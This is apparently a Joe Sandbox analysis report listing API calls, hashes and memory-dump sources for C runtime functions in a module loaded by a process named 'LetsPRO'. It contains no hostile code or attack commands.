                                        • String ID: CreateRemoteThreadEx$CreateUmsCompletionList$CreateUmsThreadContext$DeleteProcThreadAttributeList$DeleteUmsCompletionList$DeleteUmsThreadContext$DequeueUmsCompletionListItems$EnterUmsSchedulingMode$ExecuteUmsThread$GetCurrentUmsThread$GetNextUmsListItem$GetUmsCompletionListEvent$InitializeProcThreadAttributeList$QueryUmsThreadInformation$SetUmsThreadInformation$UmsThreadYield$UpdateProcThreadAttribute$kernel32.dll
                                        • API String ID: 1483908321-2643937717
                                        • Opcode ID: 7ce215876474b9e98f47460d755bafd5eaabba81e7b73b341819464a09d76042
                                        • Instruction ID: 3de86b0d068dfa365cffa8550e1652be310eba7d68490bcdb9fc204ea27ad743
                                        • Opcode Fuzzy Hash: 7ce215876474b9e98f47460d755bafd5eaabba81e7b73b341819464a09d76042
                                        • Instruction Fuzzy Hash: 095136B1B053456A9F1C9BF69C55C3F3AADEFC5284360883AE815C3A40EF35D401DB65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        APIs
                                        • __doserrno.MSVCR100 ref: 6C94F975
                                        • _errno.MSVCR100 ref: 6C94F97C
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C94F987
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _mbspbrk.MSVCR100(?,6C93308C), ref: 6C94F99B
                                        • _errno.MSVCR100 ref: 6C94F9A6
                                        • __doserrno.MSVCR100 ref: 6C94F9B0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __doserrno_errno$_invalid_parameter_invalid_parameter_noinfo_mbspbrk
                                        • String ID: ./\
                                        • API String ID: 790986403-3176372042
                                        • Opcode ID: 1b79e651e558ee191d07d873ac4ea6ed8d67437feda1415b3b3a714ce85a4f9f
                                        • Instruction ID: 852db9ef706e7e55e4656b06c9e9110a546aba74b4489ad8bce2913dc8ccb75c
                                        • Opcode Fuzzy Hash: 1b79e651e558ee191d07d873ac4ea6ed8d67437feda1415b3b3a714ce85a4f9f
                                        • Instruction Fuzzy Hash: 40C1A7B1D0166AAEDB209F65CC44BE9B7FCBF19319F10429AE518D2940E734DAC4CF94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        APIs
                                        • __doserrno.MSVCR100 ref: 6C94F4B5
                                        • _errno.MSVCR100 ref: 6C94F4BC
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C94F4C7
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _mbspbrk.MSVCR100(?,6C93308C), ref: 6C94F4DB
                                        • _errno.MSVCR100 ref: 6C94F4E6
                                        • __doserrno.MSVCR100 ref: 6C94F4F0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __doserrno_errno$_invalid_parameter_invalid_parameter_noinfo_mbspbrk
                                        • String ID: ./\
                                        • API String ID: 790986403-3176372042
                                        • Opcode ID: 3368d05f5214279f0dfa81eecfaca912076103b8c94d68d5ce929b88617cf81f
                                        • Instruction ID: bb0ca9189b9d56a54deab91df0cd56649c0f3045c5156dbdb652f0b6741865fb
                                        • Opcode Fuzzy Hash: 3368d05f5214279f0dfa81eecfaca912076103b8c94d68d5ce929b88617cf81f
                                        • Instruction Fuzzy Hash: FCC1A7B190562AAEDB20DF65CC44AE9B7FCFF19319F1082EAE518D2A40E734D984CF54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        APIs
                                        • __doserrno.MSVCR100 ref: 6C94FE50
                                        • _errno.MSVCR100 ref: 6C94FE57
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C94FE62
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _mbspbrk.MSVCR100(?,6C93308C), ref: 6C94FE76
                                        • _errno.MSVCR100 ref: 6C94FE81
                                        • __doserrno.MSVCR100 ref: 6C94FE8B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __doserrno_errno$_invalid_parameter_invalid_parameter_noinfo_mbspbrk
                                        • String ID: ./\
                                        • API String ID: 790986403-3176372042
                                        • Opcode ID: 2e605423971ea4da627b5d81e9a0f28d49a724d796c74cfc9f7c3000b73b37d3
                                        • Instruction ID: 2ba61261a0197f41660cbfaa863822b272d66700f183bd249ceb091fb3563aff
                                        • Opcode Fuzzy Hash: 2e605423971ea4da627b5d81e9a0f28d49a724d796c74cfc9f7c3000b73b37d3
                                        • Instruction Fuzzy Hash: B2B1D7B19052699EDB20DF65CC48BEAB7BCAF19319F1042D6E518E2980E734CAD4CF54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        APIs
                                        • _getptd.MSVCR100(00000083,00000001,000000BC,?,6C906D9D,?,000000BC,?,00000000,00000000,00000005), ref: 6C9084B0
                                        • GetUserDefaultLCID.KERNEL32(00000083,00000001,000000BC,?,6C906D9D,?,000000BC,?,00000000,00000000,00000005), ref: 6C908504
                                        • IsValidCodePage.KERNEL32(00000000,?,6C906D9D,?,000000BC,?,00000000,00000000,00000005), ref: 6C908556
                                        • IsValidLocale.KERNEL32(?,00000001,?,6C906D9D,?,000000BC,?,00000000,00000000,00000005), ref: 6C908569
                                        • GetLocaleInfoA.KERNEL32(?,00001001,?,00000040,?,6C906D9D,?,000000BC,?,00000000,00000000,00000005), ref: 6C9085B3
                                        • GetLocaleInfoA.KERNEL32(?,00001002,?,00000040,00000000,00000000,00000005), ref: 6C9085C7
                                        • _itoa_s.MSVCR100(00000010,?,00000010,0000000A), ref: 6C9085D8
                                        • _TranslateName.LIBCMT ref: 6C931830
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Locale$InfoValid$CodeDefaultNamePageTranslateUser_getptd_itoa_s
                                        • String ID: Norwegian-Nynorsk
                                        • API String ID: 3958957854-461349085
                                        • Opcode ID: 778a930e6bf70bd9feef4b14d0d53b35104d1fdb49315844aa06fa854d8072f2
                                        • Instruction ID: 0c7f5437ff8914b137e0d39ce32219135242426ccaefa1cdcc32f9db0959274c
                                        • Opcode Fuzzy Hash: 778a930e6bf70bd9feef4b14d0d53b35104d1fdb49315844aa06fa854d8072f2
                                        • Instruction Fuzzy Hash: 07224A7068C6955FE7028E698CC4AAA3F68DF0321CB0546FFD9998B9D3C724D847C692
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __doserrno.MSVCR100 ref: 6C950C1D
                                        • _errno.MSVCR100 ref: 6C950C24
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C950C2F
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _wcspbrk.LIBCMT(?,6C917824), ref: 6C950C43
                                        • _errno.MSVCR100 ref: 6C950C4E
                                        • __doserrno.MSVCR100 ref: 6C950C58
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __doserrno_errno$_invalid_parameter_invalid_parameter_noinfo_wcspbrk
                                        • String ID: ./\
                                        • API String ID: 668429958-3176372042
                                        • Opcode ID: 4430efe04cc8b82aef10764473239eac305df5202f5fd6ca90249b74527dc02b
                                        • Instruction ID: ecde39011dba5c9398f90109ce80f474310167d00a3904a64498e9a83f1a707e
                                        • Opcode Fuzzy Hash: 4430efe04cc8b82aef10764473239eac305df5202f5fd6ca90249b74527dc02b
                                        • Instruction Fuzzy Hash: 62C195B1905269DEDB20CF75CC44AEAB7BCBF19318F5001AAE55CD2A40E734D9A4CF64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _wcspbrk.LIBCMT(?,6C917824), ref: 6C917CEF
                                        • _getdrive.MSVCR100 ref: 6C917D09
                                          • Part of subcall function 6C917C06: GetCurrentDirectoryW.KERNEL32(00000105,?,?,?,?), ref: 6C917C39
                                        • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 6C917D20
                                        • _wcspbrk.LIBCMT(?,./\), ref: 6C917D41
                                          • Part of subcall function 6C917DBA: _errno.MSVCR100(?,?,?,6C917D65,?,?,00000104,?), ref: 6C917DC1
                                          • Part of subcall function 6C917DBA: _errno.MSVCR100(?,?,?,6C917D65,?,?,00000104,?), ref: 6C917DC8
                                          • Part of subcall function 6C917DBA: _wfullpath.MSVCR100(?,?,?,?,?,?,6C917D65,?,?,00000104,?), ref: 6C917DD9
                                          • Part of subcall function 6C917DBA: _errno.MSVCR100 ref: 6C917DE3
                                        • _wcslen.LIBCMT(00000000), ref: 6C917D6F
                                        • _errno.MSVCR100 ref: 6C917D97
                                        • __doserrno.MSVCR100 ref: 6C917DA1
                                        • __doserrno.MSVCR100 ref: 6C927CC8
                                        • _errno.MSVCR100 ref: 6C927CCF
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C927CDA
                                        • towlower.MSVCR100(00000000), ref: 6C927CF7
                                        • GetDriveTypeW.KERNEL32(00000000), ref: 6C927D09
                                        • free.MSVCR100(?), ref: 6C927D26
                                        • ___loctotime64_t.LIBCMT ref: 6C927D59
                                        • free.MSVCR100(?), ref: 6C927D86
                                          • Part of subcall function 6C917C87: _wcslen.LIBCMT(00000000,6C917D83), ref: 6C917C8A
                                        • _wsopen_s.MSVCR100(000000FF,?,00000000,00000040,00000000), ref: 6C927DCC
                                        • __fstat64i32.LIBCMT(000000FF,?), ref: 6C927DF0
                                        • _close.MSVCR100(000000FF,000000FF,?), ref: 6C927DFD
                                        • FindClose.KERNEL32(?), ref: 6C927FCE
                                        • ___wdtoxmode.LIBCMT ref: 6C927FDB
                                        • GetLastError.KERNEL32 ref: 6C92802D
                                        • __dosmaperr.LIBCMT(00000000), ref: 6C928034
                                        • FindClose.KERNEL32(?), ref: 6C928040
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$Find$Close__doserrno_wcslen_wcspbrkfree$CurrentDirectoryDriveErrorFileFirstLastType___loctotime64_t___wdtoxmode__dosmaperr__fstat64i32_close_getdrive_invalid_parameter_noinfo_wfullpath_wsopen_stowlower
                                        • String ID: ./\
                                        • API String ID: 679355030-3176372042
                                        • Opcode ID: 64b7c124a9907918c52e4b7be4932bd7124b026fb3d610c274535ba2d8c5b160
                                        • Instruction ID: 2e000e58d6b8b07a8e0baa620a9ef7398232bbd37a5a50866622c95c62ef778a
                                        • Opcode Fuzzy Hash: 64b7c124a9907918c52e4b7be4932bd7124b026fb3d610c274535ba2d8c5b160
                                        • Instruction Fuzzy Hash: CFC175F195522DDADB209F65CC44AE9B7FCBF19318F1002AAE55CE2A40E734D984CFA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __doserrno.MSVCR100 ref: 6C9507E2
                                        • _errno.MSVCR100 ref: 6C9507E9
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C9507F4
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _wcspbrk.LIBCMT(?,6C917824), ref: 6C950808
                                        • _errno.MSVCR100 ref: 6C950813
                                        • __doserrno.MSVCR100 ref: 6C95081D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __doserrno_errno$_invalid_parameter_invalid_parameter_noinfo_wcspbrk
                                        • String ID: ./\
                                        • API String ID: 668429958-3176372042
                                        • Opcode ID: 9b3d8b79d0b5552ddb64d7d80c93a5caa10bbde5b6203cca661381b3b644a878
                                        • Instruction ID: 3c1b0937c44de86e81ba6f899e3a5c9033a864559b90a408655a035f763aeb2d
                                        • Opcode Fuzzy Hash: 9b3d8b79d0b5552ddb64d7d80c93a5caa10bbde5b6203cca661381b3b644a878
                                        • Instruction Fuzzy Hash: 3EC192F1D451699ADB20CF658C44BEAB7BCBF1531CF5002EAE258E2580EB34DA94CF64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000002,?,?,00000000), ref: 6C90866D
                                        • free.MSVCR100(?,?,?,00000000), ref: 6C90868E
                                        • _calloc_crt.MSVCR100(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C90888F
                                        • strncpy_s.MSVCR100(00000000,00000000,00000000,-00000001), ref: 6C9088A9
                                        • GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 6C908914
                                        • _calloc_crt.MSVCR100(00000000,00000002,?,?,00000000), ref: 6C908923
                                        • GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 6C90893C
                                        • free.MSVCR100(00000000), ref: 6C930748
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: InfoLocale$_calloc_crtfree$strncpy_s
                                        • String ID:
                                        • API String ID: 2432546303-0
                                        • Opcode ID: 3ca070513a338c9191d4f15d4863cdfe28a5b442caf70c7eec4e94dc4e83deab
                                        • Instruction ID: 6b5dd8227629a9b87fd4b33fd14d114689a2fd4b62bf1f015777dec326dd3fb4
                                        • Opcode Fuzzy Hash: 3ca070513a338c9191d4f15d4863cdfe28a5b442caf70c7eec4e94dc4e83deab
                                        • Instruction Fuzzy Hash: 0651B172B01216EBEF159E658C44BAB3BB8BF2136CF2141AEE81892540DF31C954CF68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetLocaleInfoW.KERNEL32(?,20001004,00000005,00000002,?,?,6C90852D,?,6C906D9D,?,000000BC,?,00000000,00000000,00000005), ref: 6C90860D
                                        • strcmp.MSVCR100(00000000,ACP,?,?,6C90852D,?,6C906D9D,?,000000BC,?,00000000,00000000,00000005), ref: 6C912871
                                        • strcmp.MSVCR100(00000000,OCP,?,?,6C90852D,?,6C906D9D,?,000000BC,?,00000000,00000000,00000005), ref: 6C9317D4
                                        • GetLocaleInfoW.KERNEL32(?,2000000B,00000005,00000002,?,?,6C90852D,?,6C906D9D,?,000000BC,?,00000000,00000000,00000005), ref: 6C9317ED
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: InfoLocalestrcmp
                                        • String ID: ACP$OCP
                                        • API String ID: 3191669094-711371036
                                        • Opcode ID: 17445c587723cbc84e54a2e59c52dc92d282ce65e4d1ca8598d353457df7ee82
                                        • Instruction ID: e3f47e778231c36b0fcc09eed66715375bf49098f12c78a1344dda77104659a0
                                        • Opcode Fuzzy Hash: 17445c587723cbc84e54a2e59c52dc92d282ce65e4d1ca8598d353457df7ee82
                                        • Instruction Fuzzy Hash: 7A01D83170961EBAEB258A65EC09F9A37BCAB0375DF3044F9E405E1C90DF30C641C698
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • wcsncpy_s.MSVCR100(?,000000FF,?,00000000,?,?,?,?,?,6C90A1C4,?,?,?,?,?,?), ref: 6C90A318
                                        • wcsncpy_s.MSVCR100(?,000000FF,?,?,?,?,?,?,?,6C90A1C4,?,?,?,?,?,?), ref: 6C9312DA
                                        • wcsncpy_s.MSVCR100(?,000000FF,00000000,?,?,?,?,?,?,6C90A1C4,?,?,?,?,?,?), ref: 6C931303
                                        • wcsncpy_s.MSVCR100(?,000000FF,?,?,?,?,?,?,?,6C90A1C4,?,?,?,?,?,?), ref: 6C931320
                                        • _errno.MSVCR100(?,?,?,?,?,6C90A1C4,?,?,?,?,?,?,?,?,?), ref: 6C931389
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,6C90A1C4,?,?,?,?,?,?,?,?,?), ref: 6C931393
                                        • _errno.MSVCR100(?,?,?,?,?,6C90A1C4,?,?,?,?,?,?,?,?,?), ref: 6C9313A4
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: wcsncpy_s$_errno$_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 2268458229-0
                                        • Opcode ID: b64b2c061266d081c9ed4d5b5879bee082dc584780e9e17a906c626ae834c6df
                                        • Instruction ID: a0fa2b9e910466b34503f6934a37f4712176331175f04ec0a482e7dde2c17130
                                        • Opcode Fuzzy Hash: b64b2c061266d081c9ed4d5b5879bee082dc584780e9e17a906c626ae834c6df
                                        • Instruction Fuzzy Hash: 3971D931A04266CB9F188F1D884049A36B9EFA6358B35933FE82896D60FB71D9C1C7C5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • wcsncpy_s.MSVCR100(?,?,?,00000000), ref: 6C903C65
                                        • wcsncpy_s.MSVCR100(?,?,00000000,?), ref: 6C903C8C
                                        • wcsncpy_s.MSVCR100(?,00000003,?,00000002), ref: 6C903CBE
                                        • wcsncpy_s.MSVCR100(?,?,?,?), ref: 6C903D00
                                        • _errno.MSVCR100 ref: 6C931409
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C931413
                                        • _errno.MSVCR100 ref: 6C931424
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: wcsncpy_s$_errno$_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 2268458229-0
                                        • Opcode ID: fcf4b62c903f67a57afe48d88fb953345b3b72aa41c3411e11ee158d1a33b60d
                                        • Instruction ID: 920da5b93d5b059654373c1b8ab5f62b37dc41b63108c92a0bfa8a7719a0e1d7
                                        • Opcode Fuzzy Hash: fcf4b62c903f67a57afe48d88fb953345b3b72aa41c3411e11ee158d1a33b60d
                                        • Instruction Fuzzy Hash: DA719131A45226DBDF189F2988458AE36A9FFA530DB25923FFC1897D10F7B1C891C781
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • IsDebuggerPresent.KERNEL32 ref: 6C97C304
                                        • _crt_debugger_hook.MSVCR100(00000001), ref: 6C97C311
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6C97C319
                                        • UnhandledExceptionFilter.KERNEL32(6C97C350), ref: 6C97C324
                                        • _crt_debugger_hook.MSVCR100(00000001), ref: 6C97C335
                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 6C97C340
                                        • TerminateProcess.KERNEL32(00000000), ref: 6C97C347
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterProcessUnhandled_crt_debugger_hook$CurrentDebuggerPresentTerminate
                                        • String ID:
                                        • API String ID: 3369434319-0
                                        • Opcode ID: 5672be40680f44efd8e0b31aa88b8bef25a5ef09bab2ded615c31f9833098fbe
                                        • Instruction ID: 8cb4770bb78bd2e87a74630f9f9dba488e1c3b711d1dd1a0f64beaa68d27fbc9
                                        • Opcode Fuzzy Hash: 5672be40680f44efd8e0b31aa88b8bef25a5ef09bab2ded615c31f9833098fbe
                                        • Instruction Fuzzy Hash: 7821C5B4A092849FEF58DFA9E14864C3BB4FF1A358F24145BE80887660E7709584CF59
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • IsDebuggerPresent.KERNEL32 ref: 6C97C304
                                        • _crt_debugger_hook.MSVCR100(00000001), ref: 6C97C311
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6C97C319
                                        • UnhandledExceptionFilter.KERNEL32(6C97C350), ref: 6C97C324
                                        • _crt_debugger_hook.MSVCR100(00000001), ref: 6C97C335
                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 6C97C340
                                        • TerminateProcess.KERNEL32(00000000), ref: 6C97C347
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterProcessUnhandled_crt_debugger_hook$CurrentDebuggerPresentTerminate
                                        • String ID:
                                        • API String ID: 3369434319-0
                                        • Opcode ID: c0cbd42e0377fe9da54611e149153fd0f21ea4c04ce8404e37495883b902ee45
                                        • Instruction ID: 2bc8a7c5415796e9ea6bf62dcd991f0c766916b1ce617faa6d765cc1030b159a
                                        • Opcode Fuzzy Hash: c0cbd42e0377fe9da54611e149153fd0f21ea4c04ce8404e37495883b902ee45
                                        • Instruction Fuzzy Hash: FB21E3B4A093849FEB58DFA8E148A4C3BB4FF1A348F20146BE80887760E7709484CF59
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetLocaleInfoW.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,00000080,?,?,00000000), ref: 6C90878C
                                        • GetLocaleInfoW.KERNEL32(?,?,00000000,?,?,?,00000000), ref: 6C9087DE
